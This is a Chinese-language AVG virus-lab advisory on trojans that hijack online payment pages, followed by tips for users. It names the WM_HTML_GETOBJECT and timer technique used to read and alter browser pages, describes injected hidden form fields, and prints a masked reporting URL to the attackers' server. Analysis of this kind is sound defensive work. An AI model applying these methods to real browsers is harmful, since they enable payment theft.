歲末將至，一年一度的促銷狂潮也陸續(xù)到來(lái)，各大網(wǎng)購(gòu)網(wǎng)站施展渾身解數(shù)來(lái)吸引客戶。據(jù)最新數(shù)據(jù)顯示：僅國(guó)內(nèi)著名的網(wǎng)購(gòu)平臺(tái)淘寶在12月12日推出的全民瘋搶活動(dòng)，一個(gè)小時(shí)內(nèi)，成交額就達(dá)到了4.75億，成交量278萬(wàn)筆。令人眼花繚亂的促銷手段吸引來(lái)的不僅是諸多的網(wǎng)購(gòu)達(dá)人，更吸引了眾多黑客的目光。在最近一段時(shí)間內(nèi)，AVG中國(guó)病毒實(shí)驗(yàn)室截獲大量針對(duì)國(guó)內(nèi)各種支付平臺(tái)的病毒，包括：百聯(lián)，盛付通，快錢，訊付，易寶，支付寶等。同時(shí)針對(duì)的范圍也有所擴(kuò)大，除了網(wǎng)購(gòu)網(wǎng)站之外，一些游戲公司的充值網(wǎng)站也在此類木馬的攻擊范圍之列，如：完美，多玩，4399網(wǎng)絡(luò)游戲，征途游戲等。此類木馬大多是由某種生成器生成，并且木馬的作者提供后臺(tái)的管理系統(tǒng)。

　　此類病毒的傳播手段沒(méi)有很明顯的變化，大多還是利用社會(huì)工程學(xué)偽裝成word文檔，圖片文件，或者文本文件，誘導(dǎo)用戶點(diǎn)擊。對(duì)于攻擊的手段主要有竊取用戶的支付賬戶的密碼，修改用戶的支付賬戶。下面讓我們來(lái)近距離來(lái)接觸此類木馬，揭開(kāi)它的神秘面紗。

　　目前截獲的一些樣本中大多數(shù)具有word文檔的圖標(biāo)。這類文件可能是以郵件附件的形式存在，也有可能是賣家發(fā)送產(chǎn)品信息。在運(yùn)行過(guò)程中此類木馬會(huì)首先連接到baidu，以確定當(dāng)前的網(wǎng)絡(luò)狀況。然后連接到病毒后臺(tái)的服務(wù)器。發(fā)出的請(qǐng)求的形式如下：

　　http://119.***.***.48:858/Api/163/Post.Php?UserName=aucodehu&Bank=ICBC&Money=88(鏈接已經(jīng)處理)

　　通過(guò)以上用戶名以及銀行信息，可以進(jìn)行管理和分贓。隨后木馬會(huì)簡(jiǎn)單的收集一下系統(tǒng)的信息然后發(fā)送到相同的后臺(tái)系統(tǒng)。

　　包括本機(jī)的ip,操作系統(tǒng)版本，以及地理位置。

　　在進(jìn)行完以上的準(zhǔn)備活動(dòng)后，此木馬就開(kāi)始監(jiān)控用戶的所瀏覽的網(wǎng)址，區(qū)別于以往的代碼注入，或者劫持API之類的手法，此類木馬使用了一種更為簡(jiǎn)便而且行之有效的方法：定時(shí)器。而這種手段可能被某些主動(dòng)防御所忽略。此類木馬一般設(shè)置了三個(gè)或以上的定時(shí)器。觸發(fā)的時(shí)間間隔是200毫秒。這個(gè)時(shí)間間隔足以監(jiān)控到用戶對(duì)網(wǎng)站的操作。其中一個(gè)定時(shí)器，會(huì)通過(guò)GetCursorPos獲得當(dāng)前鼠標(biāo)的位置，進(jìn)而獲得當(dāng)前窗口的句柄。然后通過(guò)向Webbrowser控件(窗口類名是"Internet Explorer_Server")發(fā)一個(gè)WM_HTML_GETOBJECT的消息獲得IHTMLDocument對(duì)象。獲得此對(duì)象后，木馬作者就可以對(duì)該頁(yè)面進(jìn)行任何操作：解析該頁(yè)面元素，竊取自己感興趣的任何內(nèi)容，篡改支付信息等等，以下是在病毒中截取到的一個(gè)字符串的片段：

　　同時(shí)也會(huì)在頁(yè)面中添加一些屬性為隱藏的標(biāo)簽，這些標(biāo)簽是不會(huì)顯示在頁(yè)面中，但是卻是真正起作用的部分：

　　一旦點(diǎn)擊提交，這些頁(yè)面中隱藏的內(nèi)容將被提交，用戶就會(huì)面臨著信息失竊，財(cái)產(chǎn)損失。同時(shí)病毒還設(shè)置其它的定時(shí)器。用來(lái)關(guān)閉支付網(wǎng)站對(duì)用戶環(huán)境檢查的以及用戶支付失敗的頁(yè)面。

　　對(duì)于此類木馬的防范，應(yīng)該注意以下幾點(diǎn)：

　　1. 保持殺毒軟件的及時(shí)更新。

　　2. 不打開(kāi)任何不是自己主動(dòng)索取的文件。

　　3. 檢查文件的類型是否和圖標(biāo)以及后綴一致。

　　4. 網(wǎng)購(gòu)時(shí)如果發(fā)現(xiàn)任何用戶支付環(huán)境檢查的頁(yè)面被關(guān)閉，立即停止支付。

　　5. 檢查支付頁(yè)面是否被修改。

　　AVG已經(jīng)可以檢測(cè)此類病毒，用戶們只要不關(guān)閉更新，保持病毒庫(kù)在當(dāng)前最新?tīng)顟B(tài)，就可以有效阻止該木馬的侵襲。同時(shí)，AVG中國(guó)實(shí)驗(yàn)室借此提醒廣大網(wǎng)友，年底是各種網(wǎng)絡(luò)病毒爆發(fā)的高危期，平時(shí)網(wǎng)上沖浪特別是涉及財(cái)產(chǎn)交易時(shí)一定要謹(jǐn)慎再謹(jǐn)慎。